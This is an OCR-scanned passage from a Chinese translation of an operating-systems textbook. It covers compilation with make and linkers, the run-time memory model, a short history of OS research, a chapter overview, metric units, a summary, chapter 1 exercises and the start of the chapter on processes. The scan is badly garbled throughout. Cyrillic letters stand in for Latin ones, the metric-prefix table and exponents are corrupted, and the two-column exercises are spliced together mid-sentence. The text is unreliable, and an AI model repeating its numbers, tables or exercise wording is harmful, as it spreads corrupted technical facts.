代码 仅 当 系统 在 SPARC 等 机 器 上 编译 时 才 会 插入 。 通 过 使 用 #include 指 令 ， 一 个 :文件 体 可 以 含有 零 个 
或 多 个 头 文件 。 


1.8.3 大 型 编程 项 目 

为 了 构建 操作 系统 ， 每 个 .c 被 C 编 详 器 编译 成 一 个 目标 文件 。 目 标 文件 使 用 后 绥 .o， 含 有 目标 机 器 
的 二 进 制 代码 。 它 们 可 以 随后 直接 在 CPU 上 运行 。 在 C 的 世界 里 ， 没 有 类 似 于 Java 字 节 代码 的 东西 。 

5 编译 器 的 第 一 道 称 为 C 预 处 理 器 。 在 它 读 和 每 个 .文件 时 ， 每 当 遇 到 一 个 #include 指 令 ， 它 就 取 来 
该 名 称 的 头 文件 ， 并 加 以 处 理 、 扩 展 宏 、 处 理 条 件 编译 (以 及 其 他 事务 ) ， 然 后 将 结果 传递 给 编译 器 的 
下 一 道 ， 仿 佛 它们 原先 就 包含 在 该 文件 中 一 样 。 

由 于 操作 系统 非常 大 (五 百 万 行 代码 是 很 寻常 的 ) ， 每 当 文 件 修改 后 就 重新 编译 是 不 能 忍受 的 。 另 
一 方面 ， 改 变 了 用 在 成 千 个 文件 中 的 一 个 关键 头 文件 ， 确 实 需要 重新 编译 这 些 文件 。 没 有 一 定 的 协助 ， 
要 想 记录 哪个 目标 文件 与 哪个 头 文件 相关 是 完全 不 可 行 的 。 

幸运 的 是 ， 计 算 机 非常 善于 处 理事 务 分 类 。 在 UNIX 系 统 中 ， 有 个 名 为 make 的 程序 (其 大 量 的 变 体 如 
gmake、pmake 等 )， 它 读 入 Makefile， 该 Makefile 说 明 哪个 文件 与 哪个 文件 相关 。make 的 作用 是 ， 在 构建 操 
作 系 统 二 进 制 码 时 ， 检 查 此 刻 需要 哪个 目标 文件 ， 而 且 对 于 每 个 文件 ， 检 查 自从 上 次 目标 文件 创建 之 后 ， 
是 否 有 任何 它 依赖 (代码 和 头 文件 ) 的 文件 已 经 被 修改 了 。 如 果 有 ， 目 标 文件 需要 重新 编译 。 在 make 确 定 
了 哪个 .文件 需 要 重新 编译 之 后 ， 它 调用 C 编 译 器 重新 编译 这 些 文件 ， 这 样 ， 就 把 编译 的 次 数 减少 到 最 低 
限度 。 在 大 型 项 目 中 ， 创 建 Makefile 是 一 件 容易 出 错 的 工作 ， 所 以 出 现 了 一 些 工具 使 该 工作 能 够 自动 完成 。 

一 且 所 有 的 .0 文件 都 已 经 就 绪 ， 这 些 文件 被 传递 给 称 为 linker 的 程序 ， 将 其 组 合成 一 个 单个 可 执行 
的 二 进 制 文件 。 此 时 ， 任 何 被 调用 的 库 函数 都 已 经 包含 在 内 ， 函 数 之 间 的 引用 都 已 经 解决 ， 而 机 器 地 址 
也 都 按 需 要 分 配 完毕 。 在 linker 完 成 之 后 ， 得 到 一 个 可 执行 程序 ， 在 UNIX 中 传统 上 称 为 a.out 文 件 。 这 个 
过 程 中 的 各 种 部 分 如 图 1-30 所 示 ， 图 中 的 一 个 程序 包含 三 个 C 文 件 ， 两 个 头 文件 。 这 里 虽然 讨论 的 是 有 
关 操作 系统 的 开发 ， 但 是 所 有 内 容 对 开发 任何 大 型 程序 而 言 都 是 适用 的 。 
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图 1-30 编译 C 和 头 文件 ， 构 建 可 执行 文件 的 过 程 


1.8.4 运行 模型 

在 操作 系统 二 进 制 代码 链接 完成 后 ， 计 算 机 就 可 以 重新 启动 ， 新 的 操作 系统 开始 运行 。 一 旦 运行 ， 
系统 会 动态 调和 人 那些 没有 静态 包括 在 二 进 制 代码 中 的 模块 ， 诸如 设备 驱动 和 文件 系统 。 在 运行 过 程 中 ， 
操作 系统 可 能 由 若干 段 组 成 ， 有 文本 段 (程序 代码 )、 数据 段 和 堆栈 段 。 文 本 段 通常 是 不 可 改变 的 ， 在 
运行 过 程 中 不 可 修改 。 数 据 段 开 始 时 有 一 定 的 大 小 ， 并 用 确定 的 值 进行 初始 化 ， 但 是 随后 就 被 修改 了 ， 
其 大 小 随 需要 增长 。 堆 栈 段 被 初始 化 为 空 ， 但 是 随 着 对 函数 的 调用 和 从 函数 返回 ， 堆 栈 段 时 时 刻 刻 在 增 
长 和 缩小 。 通 常 文本 段 放置 在 接近 内 存 底部 的 位 置 ， 数 据 段 在 其 上 面 ， 这 样 可 以 向 上 增长 。 而 堆栈 段 处 
在 高 位 的 虚拟 地 址 ， 具 有 向 下 增长 的 能 力 ， 不 过 不 同系 统 的 工作 方式 各 有 差别 。 

在 所 有 情形 下 ， 操 作 系 统 代码 都 是 直接 在 硬件 上 执行 后 ， 不 用 解释 器 ， 也 不 是 即时 编译 ， 如 Java 通 
常 做 的 那样 。 


1.9 有 关 操 作 系统 的 研究 

计算 机 科学 是 快速 发 展 的 领域 ， 很 难 预测 其 下 一 步 的 发 展 方向 。 在 大 学 和 产业 研究 实验 宝 中 的 研究 
人 员 们 始终 在 思考 新 的 思想 ， 这 些 新 思想 中 的 某 一 些 内 容 并 没有 什么 用 处 ， 但 是 有 些 新 思想 会 成 为 未 来 
产品 的 基石 ， 并 对 产业 界 和 用 户 产生 广泛 的 影响 。 当 然 ， 事后 解说 什么 是 什么 要 比 在 当时 说 明 容易 得 多 。 
将 小 麦 从 御 子 中 分 离 出 来 是 非常 困难 的 ， 因为 一 种 思想 从 出 现 到 形成 影响 常常 需要 20 一 30 年 。 

例如 ， 当 艾森豪威尔 总 统 在 1958 年 建立 国防 部 高 级 研究 项 目 署 (ARPA) 时 ， 他 试图 通过 五 角 大 楼 
的 研究 预算 来 削弱 海军 和 空军 并 维护 陆军 的 地 位 。 他 并 不 是 想 要 发 明 Internet。 但 是 ARPA 做 的 一 件 事 是 
给 予 一 些 大 学 资助 ， 用 以 研究 模糊 不 清 的 包 交换 概念 ， 这 个 研究 很 快 导致 了 第 一 个 实验 包 交换 网 的 建立 ， 
即 ARPANET。 该 网 在 1969 年 启用 。 没 有 多 久 ， 其 他 被 ARPA 资助 的 研究 网 络 也 连接 到 ARPANET 上 ， 
于 是 Internet 诞 生 了 。Internet 恰 快 地 为 学 术 研究 人 员 们 互相 发 送 了 20 年 的 电子 邮件 。 到 了 20 世 纪 90 年 代 
早期 ，Tim Berners-Lee 在 日 内 瓦 的 CERN 研 究 所 发 明了 万 维 网 (World Wide Web), 而 Marc Andreesen 
在 伊利 诺 伊 大 学 为 万 维 网 写 了 一 个 图 形 浏览 器 。 突然 地 ，Intemet 上 充满 了 年 青 人 的 聊天 活动 。 在 知道 了 
这 一 切 之 后 艾森豪威尔 总 统 可 能 气 得 在 他 的 坟 莫 中 打滚 呢 。 

对 操作 系统 的 研究 也 导致 了 实际 操作 系统 的 戏剧 性 变化 。 正如 我 们 较 早 所 讨论 的 ， 第 一 代 商 用 计算 
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机 系统 都 是 批 处 理 系统 ， 直 到 20 世 纪 60 年 代 早期 M.LT. 发 明了 交互 式 分 时 系统 为 止 。20 世 纪 60 年 代 后 期 ， 
即 在 Doug Engelbart 于 斯 坦 福 研究 院 发 明 鼠 标 和 图 形 用 户 接口 之 前 ， 所 有 的 计算 机 都 是 基于 文本 的 。 有 
谁 会 知道 下 一 个 发 明 将 会 是 什么 呢 ? 

在 本 小 节 和 本 书 中 相关 的 其 他 章节 中 ,我 们 会 简要 地 介绍 一 些 在 过 去 5 至 10 年 中 操作 系统 的 研究 工作 ， 
这 是 为 了 让 读者 了 解 可 能 会 出 现 什么 。 这 个 介绍 当然 不 全 面 ， 而 且 主 要 依据 在 高 水 平 的 期 刊 和 会 议 上 已 
经 发 表 的 文章 ， 因 为 这 些 文章 为 了 得 以 发 表 至 少 需要 通过 严格 的 同行 评估 过 程 。 在 有 关 研 究 内 容 一 节 中 
所 引用 的 多 数 文章 ， 它 们 或 者 发 表 在 ACM 刊 物 、IEEE 计 算 机 协会 刊物 或 者 USENIX 刊 物 上 ， 并 对 这 些 组 
织 的 (学生) 成 员 们 在 Intemet 上 开放 。 有 关 这 些 组 织 的 更 多 信息 以 及 它们 的 数字 图 书馆 ， 可 以 访问 ， 


ACM http://www.acm.org 
IEEE Computer Society http://www.computer.org 
USENIX http://www.usenix.org 


实际 上 ， 所 有 的 操作 系统 研究 人 员 都 认识 到 ， 目前 的 操作 系统 是 一 个 大 的 、 不 灵活 、 不 可 靠 、 不 安 
全 和 带 有 错误 的 系统 ， 而 且 特定 的 某 个 操作 系统 较 其 他 的 系统 有 更 多 的 错误 (这 里 酶 去 了 名 称 以 避免 责 
任 )。 所 带 来 的 结果 是 ， 大 量 的 研究 集中 于 如 何 构造 更 好 的 操作 系统 。 近来 出 版 的 文献 有 如 下 一 些 ， 关 
于 新 操作 系统 (Krieger 等 人 ，2006) ， 操 作 系 统 结构 (Fassino 等 人 ，2002)， 操 作 系 统 正确 性 
(Elphinstone 等 人 ，2007，Kumar 和 Li，2002，Yang 等 人 ，2006) ， 操作 系统 可 靠 性 (Swift 等 人 ，2006， 
ТеУаѕвешг ў Л., 2004), Ф181. (Barham 等 人 ，2003，Garfinkel 等 人 ，2003，King 等 人 ，2003， 
Whitaker 等 人 ，2002)， 病 毒 和 蠕虫 (Costa 等 人 ，2005，Portokalidis 等 人 ，2006，Tucek 等 人 ，2007， 
Vrable 等 人 ，2005)， 错 误 和 排 错 (Chou 等 人 ，2001，King 等 人 ，2005)， 超 线程 与 多 线程 (Fedorova, 
2005，Bulpin 和 Pratt，2005) ， 用 户 行为 (Yu 等 人 ，2006)， 以 及 许多 其 他 课题 。 


110 本 书 其 他 部 分 概要 

我 们 已 经 叙述 完毕 引 论 ， 并 且 描绘 了 鸟 辐 式 的 操作 系统 图 景 。 现在 是 进入 具体 细节 的 时 候 了 。 正 如 
前 面 已 经 叙述 的 ， 从 程序 员 的 观点 来 看 ， 操作 系统 的 基本 目的 是 提供 一 些 关键 的 抽象 ， 其 中 最 重要 的 是 
进程 和 线程 、 地 址 空间 以 及 文件 。 所 以 后 面 三 章 都 是 有 关 这 些 关 键 主题 的 。 

第 2 章 讨 论 进程 与 线程 ， 包 括 它们 的 性 质 以 及 它们 之 间 如 何 通信 。 这 - 章 还 给 出 了 大 量 关于 进程 间 
如 何 通信 的 例子 以 及 如 何 避免 某 些 错误 。 

第 3 章 具体 讨论 地 址 空间 以 及 关联 的 内 存 管理 。 讨 论 虚拟 内 存 等 重要 课题 ， 以 及 相关 的 概念 ， 如 页 
面 处 理 和 分 段 等 。 

第 4 章 里 ， 我 们 会 讨论 有 关 文件 系统 的 所 有 重要 内 容 。 在 某 种 程度 上 ， 用 户 大 量 看 到 的 是 文件 系统 。 
我 们 将 研究 文件 系统 接口 和 文件 系统 的 实现 。 

输入 /输出 是 第 5 章 的 内 容 。 这 一 章 介绍 设备 独立 性 和 设备 依赖 性 的 概念。 将 把 若干 重要 的 设备 ， 包 
括 磁盘 、 键 盘 以 及 显示 设备 作为 示例 讲解 。 

第 6 章 讨论 死 锁 。 在 这 一 章 中 我 们 概要 地 说 明 什么 是 死 锁 ， 不 过 这 章 里 有 大 量 的 内 容 需 要 介绍 。 还 
讨论 了 避免 死 锁 的 方法 。 

到 此 ， 我 们 完成 了 对 单 CPU 操作 系统 基本 原理 的 学 习 。 不 过 ， 还 有 更 多 的 高 级 内 容 要 叙述 。 在 第 7 
章 里 ， 我 们 将 了 解 多 媒体 系统 ， 这 类 系统 的 大 量 特性 和 要 求 与 传统 的 操作 系统 存在 着 差别 。 而 在 其 他 的 
篇 幅 里 ， 我 们 会 讨论 多 媒体 的 本 质 对 调度 处 理 和 文件 系统 的 影响 。 另 一 个 高 级 课题 是 多 处 理 器 系统 ， 包 
括 多 处 理 器 、 并 行 计算 机 以 及 分 布 式 系统 。 这 些 内 容 放 在 第 8 童 中 讨论 。 

有 一 个 非常 重要 的 主题 ， 就 是 操作 系统 安全 ， 它 是 第 9 章 的 内 容 。 在 这 一 章 中 讨论 的 内 容 涉及 威胁 
(例如 ， 病 毒 和 蠕虫 )、 保 护 机 制 以 及 安全 模型 。 

随后 ， 我 们 安排 了 一 些 实际 操作 系统 的 案例 。 它 们 是 Linux (第 10 章 )、Windows Vista (第 11 章 ) 
以 及 Symbian (第 12 章 )。 本 书 以 第 13 章 关于 操作 系统 设计 的 一 些 思考 作为 结束 。 


1.11 公制 单位 
为 了 避免 混乱 ， 有 必要 在 本 书 中 特别 指出 ， 考 虑 到 计算 机 科学 的 通用 性 ， 所 以 我 们 采用 公制 以 代 丈 
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传统 的 英制 。 在 图 1-31 中 列 出 了 主要 的 公制 前 缓 。 前 绥 用 首 字 缩 写 而 成 ， 凡 是 单位 大 于 1 的 首 字母 均 大 
写 。 这 样 ， 一 个 1T8B 的 数据 库 占据 了 10? 字 节 的 存储 空间 ， 而 100 psec (或 100ps) 的 时 钟 每 隔 10-"s 的 时 
间 滴 答 一 次 。 由 于 milli 和 micro 均 以 字母 “m” 开 头 ， 所 以 必须 作出 区 分 两 者 的 选择 。 通 常 ， 用 “m” 表 
milli, mH “u” (Mirim) 表示 micro。 


指数 ESELI 具体 表示 前 级 
10° | 0.001 _ [ти [зо 1 ооо | Kilo 
[os | oooooof micro | 10° | _ 1000000 | Mega 
10° | 0.000000001 _ % nano [з | _ 1000000000 | Giga 
10? | 0.000000000001 pico | 102 1000 000 000 000 | тега 
1075 | 0.000000000000001 femto | 10% 1 000 ооо ооо ооо ооо | Peta 
10-'* | 0.0000000000000000001 atto | 10% 1 000 000 000 000 000 000 | Exa 
102" | 0.0000000000000000000001_ | zepto | 10° 1 000 000 000 000 000 000 000 | Zetta 
10 | о.оооооооооооооооооооооооот | уосю | 10 | 1 ооо ооо 000 000 000 000 ооо ооо | Yotta 


图 1-31 主要 的 公制 前 组 


这 里 需要 说 明 的 还 有 关于 存储 器 容量 的 度量 ， 在 通常 的 工业 实践 中 ， 各 个 单位 的 含义 稍 有 不 同 。 这 
里 Kilo 表 示 2"” (1024) 而 不 是 10? (1000) ， 因 为 存储 器 总 是 2 的 宕 。 这 样 IKB 存 储 器 就 有 1024 个 字 节 ， 
而 不 是 1000 个 字 节 。 类 似 地 ，1MB 存 储 器 有 22 (1 048 576) 个 字 节 ， 1GB 存 储 器 有 2” (1 073 741 824) 
个 字 节 。 但 是 ，1Kbps 的 通信 线路 每 秒 传送 1000 个 位 ， 而 10Mbps 的 局 域 网 在 10 000 000 位 / 秒 的 速率 上 运 
行 ， 因 为 这 里 的 速率 不 是 2 的 矫 。 很 不 幸 , 许 多 人 倾向 于 将 这 两 个 系统 混淆 ， 特 别 是 混淆 关于 磁盘 容量 
的 度量 。 在 本 书 中 ,为 了 避免 仿 糊 ,我们 使 有 KB、MB 和 GB 分 别 表示 2" 字 节 2” 字 节 和 2” 字 节 ， 而 用 符 
号 Kbps、Mbps 和 Gbps 分 别 表示 10'bps、10%bps 和 10?bps。 


1.12 小 结 


考察 操作 系统 有 两 种 观点 ， 资源 管理 观点 和 扩展 的 机 器 观点 。 在 资源 管理 的 观点 中 ， 操 作 系 统 的 任 
务 是 有 效 地 管理 系统 的 各 个 部 分 。 在 扩展 的 机 器 观点 中 ， 系 统 的 任务 是 为 用 户 提供 比 实际 机 器 更 便于 运 
用 的 抽象 。 这 些 抽象 包括 进程 、 地 址 空间 以 及 文件 。 

操作 系统 的 历史 很 长 ， 从 操作 系统 开始 替代 操作 人 员 的 那天 开始 ， 到 现代 多 道 程序 系统 ， 主 要 包括 
早期 批 处 理 系统 、 多 道 程序 系统 以 及 个 人 计算 机 系统 。 

由 于 操作 系统 同 硬件 的 交互 密切 ， 掌 担 一 些 硬件 知识 对 于 理解 它们 是 有 益 的 。 计 算 机 由 处 理 器 、 存 
储 器 以 及 IO 设备 组 成 。 这 些 部 件 通过 总 线 连接 。 

所 有 操作 系统 构建 所 依赖 的 基本 概念 是 进程 、 存 储 管理 、IO 管 理 、 文 件 管理 和 安全 。 这 些 内 容 都 
将 用 后 续 的 一 章 来 讲述 。 

任何 操作 系统 的 核心 是 它 可 处 理 的 系统 调用 集 。 这 些 系统 调用 真实 地 说 明了 操作 系统 所 做 的 工作 。 
对 于 UNIX， 我 们 已 经 考察 了 四 组 系统 调用 。 第 一 组 系统 调用 同 进程 的 创建 和 终结 有 关 ， 第 二 组 用 于 读 
пх, 第 三 组 用 于 目录 管理 ， 第 四 组 包括 各 种 杂项 调用 。 

操作 系统 构建 方式 有 多 种 。 最 常见 的 有 单 体系 统 、 层 次 化 系统 、 微 内 核 系 统 、 客 户 机 一 服务 器 系统 、 
虚拟 机 系统 和 外 核 系统 。 


习题 
1. 什么 是 多 道 程序 设计 ? 进 System/360 大 型 机 。 现 在 这 种 思想 已 经 消亡 
2. 什么 是 SPOOLing? 读者 是 否认 为 将 来 的 高 级 个 了 还 是 继续 活跃 着 ? 

人 计算 机 会 把 SPOOLing 作 为 标准 功能 ? 5. 缓慢 采用 GUI 的 一 个 原因 是 支持 它 的 硬件 的 成 


3. 在 早期 计算 机 中 ， 每 个 字 节 的 读 写 直接 由 CPU 本 (高昂 )。 为 了 支持 25 行 80 列 字符 的 单 色 文本 
处 理 ( 即 没有 DMA)。 对 于 多 道 程序 而 言 这 种 屏幕 应 该 需要 多 少 视频 RAM? 对 于 1024 x 768 
组 织 方式 有 什么 含义 ? 像素 24 位 色彩 位 图 需要 多 少 视频 RAM? 在 1980 

4. 系列 计算 机 的 思想 在 20 世 纪 60 年 代 由 IBM 引入 年 ($5/KB) 这 些 RAM 的 成 本 是 多 少 ? 现在 它 的 
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成 本 是 多 少 ? 

6. 在 建立 一 个 操作 系统 时 有 几 个 设计 目的 ， 例 如 
资源 利用 、 及 时 性 、 健 壮 性 等 。 请 列举 两 个 可 
能 互相 矛盾 的 设计 目的 。 

7. 下 面 的 哪 一 条 指令 只 能 在 内 核 态 中 使 用 ? 

а) 禁止 所 有 的 中 断 。 

b) 读 日 期 -时 间 时 钟 。 
c) 设置 日 期 -时 间 时 钟 。 
d) 改变 存储 器 映像 。 

8. 考虑 一 个 有 两 个 CPU 的 系统 ， 并 且 每 一 个 CPU 
有 两 个 线程 ( 超 线程 )。 假设 有 三 个 程序 P0, РІ, 
P2， 分 别 以 运行 时 间 5ms，10ms，20ms 开始 。 
运行 这 些 程序 需要 多 少时 间 ? 假设 这 三 个 程序 
都 是 100% 限于 СРО, 在 运行 时 无 阻塞 ， 并且 
- 且 设 定 就 不 改变 CPU 。 

9. 一 台 计 算 机 有 一 个 四 级 流水 线 ， 每 一 级 都 花费 
相同 的 时 间 执行 其 工作 ， 即 lns。 这 台 机 器 每 秒 
可 执行 多 少 条 指令 ? 

10. 假 设 一 个 计算 机 系统 有 高 速 缓存 、 内 存 
(КАМ) 以 及 磁盘 ， 操 作 系统 用 虚拟 内 存 。 读 
取 缓 存 中 的 一 个 词 需要 2ns， КАМ 需要 10ns， 
磁盘 需要 10ms。 如 果 缓存 的 命中 率 是 95%, 
内 存 的 是 (缓存 失效 时 ) 99%， 读 取 一 个 词 的 
平均 时 间 是 多 少 ? 

1. 一 位 校对 人 员 注 意 到 在 一 部 将 要 出 版 的 操作 系 
统 教科 书 手稿 中 有 一 个 多 次 出 现 的 拼写 错误 。 
这 本 书 大 致 有 700 页 。 每 页 50 行 , 一行 80 个 字符 。 
车 把 文稿 用 电子 扫描 ， 那 么 ， 主 副本 进入 图 1-9 
中 的 每 个 存储 系统 的 层次 要 花费 多 少时 间 ? 对 
于 内 存储 方式 ， 考 虑 所 给 定 的 存 取 时 间 是 每 次 
一 个 字符 ， 对 于 磁盘 设备 ， 假 定 存 取 时 间 是 每 
次 一 个 1024 字 符 的 盘 块 ， 而 对 于 磁带 ,假设 给 
定 开始 时 间 后 的 存 取 时 间 和 磁盘 存 取 时 间 相 同 。 

12. 在 用 户 程序 进行 一 个 系统 调用 ， 以 读 写 磁盘 文 
件 时 ， 该 程序 提供 指示 说 明了 所 需要 的 文件 ， 
一 个 指向 数据 缓冲 区 的 指针 以 及 计数 。 然 后 ， 
控制 权 转 给 操作 系统 , 它 调用 相关 的 驱动 程序 。 
假设 驱动 程序 启动 磁盘 并 且 直 到 中 断 发 生 才 终 
止 。 在 从 磁盘 读 的 情况 下 ， 很 明显 ， 调 用 者 会 

被 阻塞 (因为 文件 中 没有 数据 ) 。 在 向 磁盘 写 
时 会 发 生 什 么 情况 ?需要 把 调用 者 阻塞 一 直 等 
到 磁盘 传送 完成 为 止 吗 ? 

13. 什么 是 陷阱 指令 ? 在 操作 系统 中 解释 它 的 用 途 。 

14. 陷阱 和 中 断 的 主要 差别 是 什么 ? 

15. 在 分 时 系统 中 为 什么 需要 进程 表 ? 在 只 有 一 个 进 


程 存在 的 个 人 计算 机 系统 中 ， 该 进程 控制 整个 机 
器 直到 进程 结束 ， 这 种 机 器 也 需要 进程 表 吗 ? 

16. 说 明 有 没有 理由 要 在 一 个 非 空 的 目录 中 安装 一 
个 文件 系统 ?如 果 要 这 样 做 ， 如 何 做 ? 

17. 在 一 个 操作 系统 中 系统 调用 的 目的 是 什么 ? 

18. 对 于 下 列 系统 调用 ， 给 出 引起 失败 的 条 件 ; 
fork、exec 以 及 unlink 。 

19. 在 
count = write(fd, buffer nbytes); 
调用 中 ， 能 在 count 中 而 不 是 nbytes 中 返回 什 
m? 如 果 能 ， 为 什么 ? 

20. 有 一 个 文件 ， 其 文件 描述 符 是 fg， 内 含 下 列 字 
PEF: 3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 5, 
有 如 下 系统 调用 ， 

Iseek(fd, 3, ЅЕЕК_ЅЕТ); 

read(fd, &buffer 4); 

其 中 lseek 调 用 寻找 文件 中 的 字 节 3。 在 读 操作 
完成 之 后 ，buffer 中 的 内 容 是 什么 ? 
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一 个 轨道 上 (轨道 号 : 50). BEARR НЕ 
时 位 于 第 100 号 轨道 。 要 想 从 磁盘 上 找 回 这 个 
文件 ， 需 要 多 长 时 间 ? 假设 磁头 臂 从 一 个 柱 
面 移动 到 下 一 个 柱 面 需要 lms ， 当 文件 的 开始 
部 分 存储 在 的 扇 区 旋转 到 磁头 下 需要 Sms, 
并 且 读 的 速率 是 100MB/s。 
22. 块 特殊 文件 和 字符 特殊 文件 的 基本 差别 是 什么 ? 
23. 在 图 1-17 的 例子 中 库 调用 称 为 read， 而 系统 调 
用 自身 称 为 read。 这 两 者 都 有 相同 的 名 字 是 正 
Жї? 如 果 不 是 ， 哪 一 个 更 重要 ? 
24. 在 分 布 式 系统 中 ， 客 户 机 一 服务 器 模式 很 普遍 。 
这 种 模式 能 用 在 单个 计算 机 的 系统 中 吗 ? 
对 程序 员 而 言 ， 系 统 调用 就 像 对 其 他 库 过 程 的 
调用 一 样 。 有 无 必要 让 程序 员 了 解 哪 一 个 库 过 
程 导致 了 系统 调用 ? 在 什么 情形 下 ， 为 什么 ? 
26. 图 1-23 说 明 有 一 批 UNIX 的 系统 调用 没有 与 之 
相等 价 的 Win32 API。 对 于 所 列 出 的 每 一 个 没 
有 Win32 等 价 的 调用 ， 若 程序 员 要 把 一 个 
UNIX 程 序 转换 到 Windows 下 运行 ， 会 有 什么 
后 果 ? 
可 移植 的 操作 系统 是 能 从 一 个 系统 体系 结构 到 
另 一 个 体系 结构 的 移动 不 需要 任何 修改 的 操作 
系统 。 请 解释 为 什么 建立 一 个 完全 可 移植 性 的 
操作 系统 是 不 可 行 的。 描述 一 下 在 设计 一 个 高 
度 可 移植 的 操作 系统 时 你 设计 的 高 级 的 两 层 是 
什么 样 的 。 
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28. 请 解释 在 建立 基于 微 内 核 的 操作 系统 时 策略 与 
机 制 的 分 离 带 来 的 好 处 。 

29. 下 面 是 单位 转换 的 练习 ， 

a) 一 微 年 是 多 少 秒 ? 

b) 微米 常 称 为 micron。 那 么 gigamicron 是 多 长 ? 

с) 1TB 存 储 器 中 有 多 少 字 节 ? 

中 地 球 的 质量 是 6000 yottagram, 换算 成 
kilogram 是 多 少 ? 

30. 写 一 个 和 图 1-19 类 似 的 shell， 但 是 包含 足够 的 
实际 可 工作 的 代码 ， 这 样 读者 可 测试 它 。 读 者 
还 可 以 添加 某 些 功能 ， 如 输入 输出 重 定向 、 管 
道 以 及 后 台 作 业 等 。 

31. 如 果 读 者 拥有 一 个 个 人 UNIX 类 操作 系统 
(Linux、MINIX、Free BSD 等 )， 可 以 安全 地 


32. 


崩溃 和 再 启动 ， 请 写 一 个 可 以 试图 创建 一 个 无 
限制 数量 子 进程 的 shell 脚 本 并 观察 所 发 生 的 
事 。 在 运行 实验 之 前 ， 通 过 shell 键 入 sync， 在 
磁盘 上 备 好 文件 缓冲 区 以 避免 毁坏 文件 系统 。 
注意 ; 在 没有 得 到 系统 管理 员 的 允许 之 前 ， 不 
要 在 分 时 系统 上 进行 这 一 尝试 。 其 后 果 将 会 立 
即 发 生 ， 尝 试 者 可 能 会 被 抓 住 并 受到 惩 到 。 

用 一 个 类 似 于 UNIX od 或 MS-DOS DEBUG 的 
程序 考察 并 尝试 解释 UNIX 类 系统 或 Windows 
的 目录 。 提示 : 如 何 进行 取决 于 OS 允许 做 什么 。 
一 个 有 益 的 技巧 是 在 一 个 有 某 个 操作 系统 的 软 
盘 上 创建 一 个 目录 ， 然 后 使 用 一 个 允许 进行 此 
类 访问 的 不 同 的 操作 系统 读 盘 上 的 原始 数据 。 


第 2 章 进程 与 线程 


从 本 章 开始 我 们 将 深入 考察 操作 系统 是 如 何 设计 和 构造 的 。 操作 系统 中 最 核心 的 概念 是 进程 : 这 是 
对 正在 运行 程序 的 一 个 抽象 。 操作 系统 的 其 他 所 有 内 容 都 是 围绕 着 进程 的 概念 展开 的 ， 所 以 ， 让 操作 系 
统 的 设计 者 (及 学 生 ) 尽早 并 透彻 地 理解 进程 是 非常 重要 的 。 

进程 是 操作 系统 提供 的 最 古老 的 也 是 最 重要 的 抽象 概念 之 一 。 即使 可 以 利用 的 CPU 只 有 一 个 ， 
但 它们 也 支持 〈 伪 ) 并 发 操作 的 能 力 。 它们 将 一 个 单独 的 CPU 变换 成 多 个 虚拟 的 CPU。 没 有 进程 的 抽 
象 ， 现 代 计算 将 不 复 存在 。 在 本 章 里 我 们 会 通过 大 量 的 细节 去 探究 进程 ， 以 及 它们 的 第 一 个 亲戚 - 
线程 。 


2.1 进程 

所 有 现代 的 计算 机 经 常会 在 同一 时 间 做 许多 件 事 。 习惯 于 在 个 人 计算 机 上 工作 的 人 们 也 许 不 会 十 分 
注意 这 个 事实 ， 因 此 列举 一 些 例子 可 以 更 清楚 地 说 明 这 一 问题 。 先 考虑 一 个 网 络 服务 器 。 从 各 处 进入 一 
些 网 页 请 求 。 当 一 个 请 求 进入 时 ， 服务 器 检查 是 否 其 需要 的 网 页 在 缓存 中 。 如 果 是 ， 则 把 网 页 发 送 回 
о 如 果 不 是 ， 则 启动 一 个 磁盘 请 求 以 获取 网 页 。 然 而 ， 从 CPU 的 角度 来 看 ， 磁 盘 请 求 需要 漫长 的 时 间 。 
当 等 待 磁盘 请 求 完成 时 ， 其 他 更 多 的 请 求 将 会 进入 。 如 果 有 多 个 磁盘 存在 ， 会 在 满足 第 一 个 请 求 之 前 就 
接二连三 地 对 其 他 的 磁盘 发 出 一 些 或 所 有 的 请 求 。 很 明显 ， 需要 一 些 方法 去 模拟 并 控制 这 种 并 发 。 进 程 
(特别 是 线程 ) 在 这 里 就 可 以 产生 作用 。 

现在 考虑 只 有 一 个 用 户 的 PC。 一 般 用 户 不 知道 ， 当 启动 系统 时 ， 会 秘密 启动 许多 进程 。 例 如 ， 启 
动 一 个 进程 用 来 等 待 进入 的 电子 邮件 ， 或 者 启动 另 一 个 防 病毒 进程 周期 性 地 检查 是 否 有 新 的 有 效 的 病毒 
定义 。 另 外 ， 某 个 用 户 进程 也 许 会 在 所 有 用 户 上 网 的 时 候 打印 文件 以 及 烧 录 CD-ROM 。 所 有 的 这 些 活 动 
需要 管理 ， 于 是 一 个 支持 多 进程 的 多 道 程序 系统 在 这 里 就 显得 很 有 用 了 。 

在 任何 多 道 程序 设计 系统 中 ， CPU 由 一 个 进程 快速 切换 至 另 一 个 进程 ， 使 每 个 进程 各 运行 几 十 或 几 
百 个 毫秒 。 严 格 地 说 ， 在 某 一 个 瞬间 ，CPU 只 能 运行 一 个 进程 。 但 在 1 秒 钟 期 间 ， 它 可 能 运行 多 个 进程 ， 
这 样 就 产生 并 行 的 错觉 。 有 时 人 们 所 说 的 的 并 行 就 是 指 这 种 情形 ， 以 此 来 区 分 多 处 理 器 系统 (该 系统 有 
两 个 或 多 个 CPU 共享 同一 个 物理 内 存 ) 的 真正 硬件 并 行 。 人 们 很 难 对 多 个 并 行 活动 进行 跟踪 。 因 此 ， 经 
过 多 年 的 努力 ， 操作 系统 的 设计 者 发 展 了 用 于 描述 并 行 的 一 种 概念 模型 (顺序 进程 )， 使 得 并 行 更 容易 
处 理 。 有 关 该 模型 、 它 的 使 用 以 及 它 的 影响 正 是 本 章 的 主题 。 


2.1.1 进程 模型 

在 进程 模型 中 ， 计 算 机 上 所 有 可 运行 的 软件 ， 通常 也 包括 操作 系统 ， 被 组 织 成 若干 顺 序 进程 
(sequential process) ， 简 称 进程 (process) 。 一 个 进程 就 是 一 个 正在 执行 程序 的 实例 ， 包 括 程序 计数 器 、 
寄存 器 和 变量 的 当前 值 。 从 概念 上 说 ， 每 个 进程 拥有 它 自己 的 虚拟 CPU。 当 然 ， 实际 上 真正 的 CPU 在 各 
进程 之 间 来 回 切换 。 但 为 了 理解 这 种 系统 ， 考 虑 在 (6) 并 行情 况 下 运行 的 进程 集 ， 要 比 我 们 试图 跟踪 
CPU 如 何在 程序 间 来 回 切 换 简单 得 多 。 正 如 在 第 1 章 所 看 到 的 ， 这 种 快速 的 切换 称 作 多 道 程序 设计 。 

